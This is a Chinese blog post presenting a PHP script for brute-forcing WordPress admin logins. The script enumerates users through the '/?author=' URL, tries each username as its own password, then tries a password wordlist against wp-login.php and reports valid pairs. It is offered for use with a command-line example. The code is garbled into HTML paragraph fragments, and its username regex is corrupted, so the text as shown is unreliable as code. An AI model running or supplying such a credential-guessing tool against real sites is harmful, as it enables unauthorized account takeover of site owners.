2013/09/17 15:04 | 瞌睡龙
在做渗透测试的时候,有时候会遇到一个wordpress博客,如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。
大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢,下次发包还是调用命令结合hydra来爆破。
原理是通过URL
/?author=
遍历获取用户名,然后先跑用户名与密码相同的用户,再调用同目录下pass.txt中的密码文件进行爆破。
默认获取前10个用户,可自行修改。
使用方法:
php wordpress.php http://www.test.com
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
<?php
set_time_limit(0);
$domain
=
$argv
[1];
//获取用户名
for
(
$i
=1;
$i
<= 10;
$i
++) {
$url
=
$domain
.
"/?author="
.
$i
;
$response
= httprequest(
$url
,0);
if
(
$response
== 404) {
continue
;
}
$pattern
=
"{
(./*) |}"</p>
<p>;</p>
<p>preg_match(</p>
<p>$pattern</p>
<p>,</p>
<p>$response</p>
<p>,</p>
<p>$name</p>
<p>);</p>
<p>$namearray</p>
<p>[] =</p>
<p>$name</p>
<p>[1];
}</p>
<p>echo</p>
<p>"共获取用户"</p>
<p>.</p>
<p>count</p>
<p>(</p>
<p>$namearray</p>
<p>).</p>
<p>"名用户\n"</p>
<p>;</p>
<p>echo</p>
<p>"正在破解用户名与密码相同的用户:\n"</p>
<p>;</p>
<p>$crackname</p>
<p>= crackpassword(</p>
<p>$namearray</p>
<p>,</p>
<p>"same"</p>
<p>);</p>
<p>$passwords</p>
<p>= file(</p>
<p>"pass.txt"</p>
<p>);</p>
<p>echo</p>
<p>"正在破解弱口令用户:\n"</p>
<p>;</p>
<p>if</p>
<p>(</p>
<p>$crackname</p>
<p>) {</p>
<p>$namearray</p>
<p>=</p>
<p>array_diff</p>
<p>(</p>
<p>$namearray</p>
<p>,</p>
<p>$crackname</p>
<p>);
}</p>
<p>crackpassword(</p>
<p>$namearray</p>
<p>,</p>
<p>$passwords</p>
<p>);</p>
<p>function</p>
<p>crackpassword(</p>
<p>$namearray</p>
<p>,</p>
<p>$passwords</p>
<p>){</p>
<p>global</p>
<p>$domain</p>
<p>;</p>
<p>$crackname</p>
<p>=</p>
<p>""</p>
<p>;</p>
<p>foreach</p>
<p>(</p>
<p>$namearray</p>
<p>as</p>
<p>$name</p>
<p>) {</p>
<p>$url</p>
<p>=</p>
<p>$domain</p>
<p>.</p>
<p>"/wp-login.php"</p>
<p>;</p>
<p>if</p>
<p>(</p>
<p>$passwords</p>
<p>==</p>
<p>"same"</p>
<p>) {</p>
<p>$post</p>
<p>=</p>
<p>"log="</p>
<p>.urlencode(</p>
<p>$name</p>
<p>).</p>
<p>"&pwd="</p>
<p>.urlencode(</p>
<p>$name</p>
<p>).</p>
<p>"&wp-submit=%E7%99%BB%E5%BD%95&redirect_to="</p>
<p>.urlencode(</p>
<p>$domain</p>
<p>).</p>
<p>"%2Fwp-admin%2F&testcookie=1"</p>
<p>;</p>
<p>$pos</p>
<p>=</p>
<p>strpos</p>
<p>(httprequest(</p>
<p>$url</p>
<p>,</p>
<p>$post</p>
<p>),</p>
<p>'div id="login_error"'</p>
<p>);</p>
<p>if</p>
<p>(</p>
<p>$pos</p>
<p>=== false) {</p>
<p>echo</p>
<p>"$name $name"</p>
<p>.</p>
<p>"\n"</p>
<p>;</p>
<p>$crackname</p>
<p>[] =</p>
<p>$name</p>
<p>;</p>
<p>}</p>
<p>}</p>
<p>else</p>
<p>{</p>
<p>foreach</p>
<p>(</p>
<p>$passwords</p>
<p>as</p>
<p>$pass</p>
<p>) {</p>
<p>$post</p>
<p>=</p>
<p>"log="</p>
<p>.urlencode(</p>
<p>$name</p>
<p>).</p>
<p>"&pwd="</p>
<p>.urlencode(</p>
<p>$pass</p>
<p>).</p>
<p>"&wp-submit=%E7%99%BB%E5%BD%95&redirect_to="</p>
<p>.urlencode(</p>
<p>$domain</p>
<p>).</p>
<p>"%2Fwp-admin%2F&testcookie=1"</p>
<p>;</p>
<p>$pos</p>
<p>=</p>
<p>strpos</p>
<p>(httprequest(</p>
<p>$url</p>
<p>,</p>
<p>$post</p>
<p>),</p>
<p>'div id="login_error"'</p>
<p>);</p>
<p>if</p>
<p>(</p>
<p>$pos</p>
<p>=== false) {</p>
<p>echo</p>
<p>"$name $pass"</p>
<p>.</p>
<p>"\n"</p>
<p>;</p>
<p>}</p>
<p>}</p>
<p>}</p>
<p>}</p>
<p>return</p>
<p>$crackname</p>
<p>;</p>
<p>}</p>
<p>function</p>
<p>httprequest(</p>
<p>$url</p>
<p>,</p>
<p>$post</p>
<p>){</p>
<p>$ch</p>
<p>= curl_init();</p>
<p>curl_setopt(</p>
<p>$ch</p>
<p>, CURLOPT_URL,</p>
<p>"$url"</p>
<p>);</p>
<p>curl_setopt(</p>
<p>$ch</p>
<p>, CURLOPT_RETURNTRANSFER, 1);</p>
<p>curl_setopt(</p>
<p>$ch</p>
<p>, CURLOPT_SSL_VERIFYPEER, false);</p>
<p>curl_setopt(</p>
<p>$ch</p>
<p>, CURLOPT_FOLLOWLOCATION,1);</p>
<p>if</p>
<p>(</p>
<p>$post</p>
<p>){</p>
<p>curl_setopt(</p>
<p>$ch</p>
<p>, CURLOPT_POST, 1);</p>
<p>//post提交方式</p>
<p>curl_setopt(</p>
<p>$ch</p>
<p>, CURLOPT_POSTFIELDS,</p>
<p>$post</p>
<p>);</p>
<p>}</p>
<p>$output</p>
<p>= curl_exec(</p>
<p>$ch</p>
<p>);</p>
<p>$httpcode</p>
<p>= curl_getinfo(</p>
<p>$ch</p>
<p>,CURLINFO_HTTP_CODE);</p>
<p>curl_close(</p>
<p>$ch</p>
<p>);</p>
<p>if</p>
<p>(</p>
<p>$httpcode</p>
<p>== 404) {</p>
<p>return</p>
<p>404</p>
<p>}</p>
<p>else</p>
<p>{ </p>
<p>return</p>
<p>$output</p>
<p>; </p>
<p>}
}</p>
<p>?></p>
</div>
<section id='after_content_widget'><div class="widget" id="widget_after_content_wumiiRelatedItems>">
<script type="text/javascript" id="wumiiRelatedItems"></script>
</div><div class="widget" id="widget_after_content_post_footer_info>">
<div class="panel panel-success">
<div class="panel-heading" align="center">希望本站内容对您有点用处,有什么疑问或建议请在后面留言评论</div>
<div align="center" class="panel-body">转载请注明作者(<a href="http://itsolife.com/about/">RobinChia</a>)和出处 <a href="http://itsolife.com">It so life</a> ,请勿用于任何商业用途</div>
<div class="panel-body">本文链接: <a href="/2014/02/02/2014-02-02-安全-PHP-WordPress--跑wordpress用户密码脚本/">跑wordpress用户密码脚本</a></div>
</div>
</div></section>
<footer id="post-meta">
<span class="categories">Posted in<span class="breadcrumb fa fa-folder"><li><a href="/categories/安全/">安全</a></li></span><span class="breadcrumb"><li><a href="/categories/安全/">安全</a></li><li><a href="/categories/安全/PHP-WordPress/">PHP-WordPress</a></li></span></span> | <span class="tags">Tagged <a href="/tags/PHP-WordPress/" class="label label-primary">PHP-WordPress</a><a href="/tags/安全/" class="label label-success">安全</a></span> | <span class="time">recent updated:<time title="2014-03-29 14:47:36"datetime="2014-03-29 14:47:36"> mar. 29 2014</time></span> | <span class="comment-link">
<a href="http://itsolife.com/2014/02/02/2014-02-02-安全-PHP-WordPress--跑wordpress用户密码脚本/#comments" class="ds-thread-count comment-link" data-thread-key="2014-02-02-安全-PHP-WordPress--跑wordpress用户密码脚本" data-count-type="comments">暂无评论</a></span>
</footer>
<div class="clearfix"></div>
</div>
</div>
</article>
<section id='after_post_widget'><div class="widget" id="widget_after_post_post_pageNav>">
<ul class="pager">
<li class="previous"><a href="/2014/02/02/2014-02-02-安全-Java--攻击JavaWeb应用7-Server篇1/" title="攻击JavaWeb应用[7]">← 攻击JavaWeb应用[7]</a></li>
<li class="next"><a href="/2014/02/02/2014-02-02-mac--VMware9虚拟机安装MACOSXMountainLion1082详细图文教程/" title="VMware9虚拟机安装MAC OS X Mountain Lion 10.8.2详细图文教程">VMware9虚拟机安装MAC OS X Mountain Lion 10.8.2详细图文教程 →</a></li>
</ul></div><div class="widget" id="widget_after_post_related_posts>">
<ul class="list-group"><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全-X--3306端口的入侵mysql/">3306端口的入侵(mysql)</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全-SQL注入--利用SQL注入漏洞登录后台/">利用SQL注入漏洞登录后台</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全-Scripts--BrowserSecurity-css、javascript/">Browser Security</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全-X--这个世界是一点懒都偷不了的!_Vexs_百度空间/">这个世界是一点懒都偷不了的!_Vexs_百度空间</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全-X--四大传奇:中国网络黑客组织/">四大传奇:中国网络黑客组织</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全-学习手册类--sqlmap用户手册/">sqlmap用户手册</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全--Burpsuite教程与技巧之HTTPbrute暴力破解/">Burpsuite教程与技巧之HTTP brute暴力破解</a></li><li class="list-group-item"><a href="/2014/02/02/2014-02-02-安全--一次服务器被入侵后的分析/">一次服务器被入侵后的分析</a></li></ul></div></section>
<div id="comments"><!-- Duoshuo Comment BEGIN -->
<div class="ds-thread" data-thread-key="2014-02-02-安全-PHP-WordPress--跑wordpress用户密码脚本" data-url="http://itsolife.com/2014/02/02/2014-02-02-安全-PHP-WordPress--跑wordpress用户密码脚本/" data-title="跑wordpress用户密码脚本"></div>
<!-- Duoshuo Comment END -->
</div></div><!--wapper-->
</div><!-- ID main-col END -->
<aside id="sidebar" class="alignright col-sx-6 col-sm-4 col-md-3 col-lg-3">
<div id="widget_search" class="widget panel panel-primary">
<form action="//google.com/search" method="get" accept-charset="utf-8">
<div class="input-group">
<input class="form-control" id="searchbox" type="search" name="q" results="0" placeholder="search">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">Go!</button>
</span>
<input type="hidden" name="q" value="site:itsolife.com">
</div>
</form>
</div>
<div id="widget_category" class="widget panel panel-primary">
<div class="panel-heading">category</div> <div data-src='category' class='ajax_widgets'>正在加载...</div>
</div>
<div id="widget_recent_posts" class="widget panel panel-primary">
<div class="panel-heading">recent posts</div> <div data-src='recent_posts' class='ajax_widgets'>正在加载...</div></div>
<div id="widget_tagcloud" class="widget panel panel-primary">
<div class="panel-heading">tagcloud</div> <div data-src='tagcloud' class='ajax_widgets'>正在加载...</div></div>
<div id="widget_latest_update_posts" class="widget panel panel-primary">
<div class="panel-heading">最近更新</div> <div data-src='latest_update_posts' class='ajax_widgets'>正在加载...</div></div>
<div id="widget_recent_comments" class="widget panel panel-primary">
<div class="panel-heading">recent comments</div>
<div class="list-group-item ds-recent-comments" data-num-items="6" data-show-avatars="1" data-show-time="1" data-show-title="1" data-show-admin="1" data-excerpt-length="50"></div>
</div>
</aside>
<div class="clearfix"></div>
</div><!-- row END -->
</div>
<footer id="footer" class="container">
<div class="panel panel-info">
<section id='footer_widget'></section> <div class="panel-footer">
<div id="site-info">
<span class='author'>
© 2014 RobinChia
</span>
<span id='analytics-51la'></span><span id='analytics-google'>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-48559895-1']);
_gaq.push(['_trackPageview']);
_js2load.push({src:('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'});
</script></span><span id='analytics-cnzz'>
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_5774006'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s17.cnzz.com/stat.php%3Fid%3D5774006%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>
</span><span id='analytics-baidu'>
<script>
var _hmt = _hmt || [];
_js2load.push({src:"//hm.baidu.com/hm.js?eaa92c12166944fd3a160103e6c4a8cf"});
</script>
</span> </div>
<div id="copyright">Site powered by <a href='http://zespia.tw/hexo/'><strong>hexo</strong></a> update time: <em>2014-03-29 14:47:36</em></span></div>
</div>
<div class="clearfix"></div>
</div>
</footer>
<script src="http://cdn.bootcss.com/jquery/1.10.2/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/twitter-bootstrap/3.1.0/js/bootstrap.min.js"></script>
<script src="http://cdn.bootcss.com/prettify/r298/prettify.min.js"></script> <script type="text/javascript">
var lang=["bsh", "c", "cc", "cpp", "cs", "csh", "cyc", "cv", "htm", "html",
"java", "js", "m", "mxml", "perl", "pl", "pm", "py", "rb", "sh",
"xhtml", "xml", "xsl"];
var pretty_base='';
$('script').each(function(){
var c = $(this).attr('src');
if (!c)
return;
if (c.match(/(\/)?prettify(\.min)?\.js/i))
{
var index = c.lastIndexOf('/');
if (index != -1)
pretty_base = c.substr(0,index + 1);
return false;
}
})
$('pre code').each(function(){
var c = $(this).attr('class')
if (!c)
return;
c = c.match(/\s?(lang\-\w+)/i);
if (c && lang.indexOf(c[1]) == -1)
{
lang.push(c[1]);
$.getScript(pretty_base + c[1] + '.min.js');
}
})
$(window).load(function(){
$("pre").addClass("prettyprint");
prettyPrint();
})
</script>
<script type="text/javascript">
var duoshuoQuery = {short_name:"robinchia"};
_js2load.push({src:'http://static.duoshuo.com/embed.js',charset:'UTF-8'});
</script>
<!--wumii_relatedItems-->
<script type="text/javascript">
var wumiiPermaLink = "http://itsolife.com/2014/02/02/2014-02-02-安全-PHP-WordPress--跑wordpress用户密码脚本/";
var wumiiTitle = "跑wordpress用户密码脚本";
var wumiiTags = "PHP-WordPress,安全";
var wumiiCategories = ["安全","安全","PHP-WordPress"];
var wumiiSitePrefix = "http://itsolife.com";
var wumiiParams = "&num=5&mode=3&pf=JAVASCRIPT";
_js2load.push({src:'http://widget.wumii.cn/ext/relatedItemsWidget'});
</script>
<a href="http://www.wumii.com/widget/relatedItems" style="border:0;">
<img src="http://static.wumii.cn/images/pixel.png" alt="无觅关联推荐,快速提升流量" style="border:0;padding:0;margin:0;" />
</a>
<script src="http://cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js"></script> <script type="text/javascript">
(function($){
$('.entry').each(function(i){
$(this).find('img').each(function(){
var alt = this.alt;
if (alt){
$(this).before('<span class="caption">' + alt + '</span>');
}
$(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox" rel="fancybox' + i + '" />');
});
});
$('.fancybox').fancybox();
})(jQuery);
</script>
<script src="http://cdn.bootcss.com/mathjax/2.3/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/x-mathjax-config">
MathJax.Hub.Config({
tex2jax: {
skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
inlineMath: [ ['$','$'], ["\\(","\\)"] ],
processEscapes: true
}
});
MathJax.Hub.Queue(function() {
var all = MathJax.Hub.getAllJax(), i;
for(i=0; i < all.length; i += 1) {
all[i].SourceElement().parentNode.className += ' has-jax';
}
});
</script>
<script type="text/javascript">
$('.ajax_widgets').each(function(){var src=$(this).attr('data-src');if(src)$(this).load('/widgets/'+src+'.html');});
$.each(_js2load,function(index,obj){loadjs(obj.src,obj.charset)});
</script>
<div id="scroll2top">
<img src="/scroll2top/arrow.png"/>
</div>
<script src="/scroll2top/scroll2top.min.js"></script>
<div id="winterland">
<canvas></canvas>
</div>
<script src="/js/winterland.min.js"></script>
</body>
</html>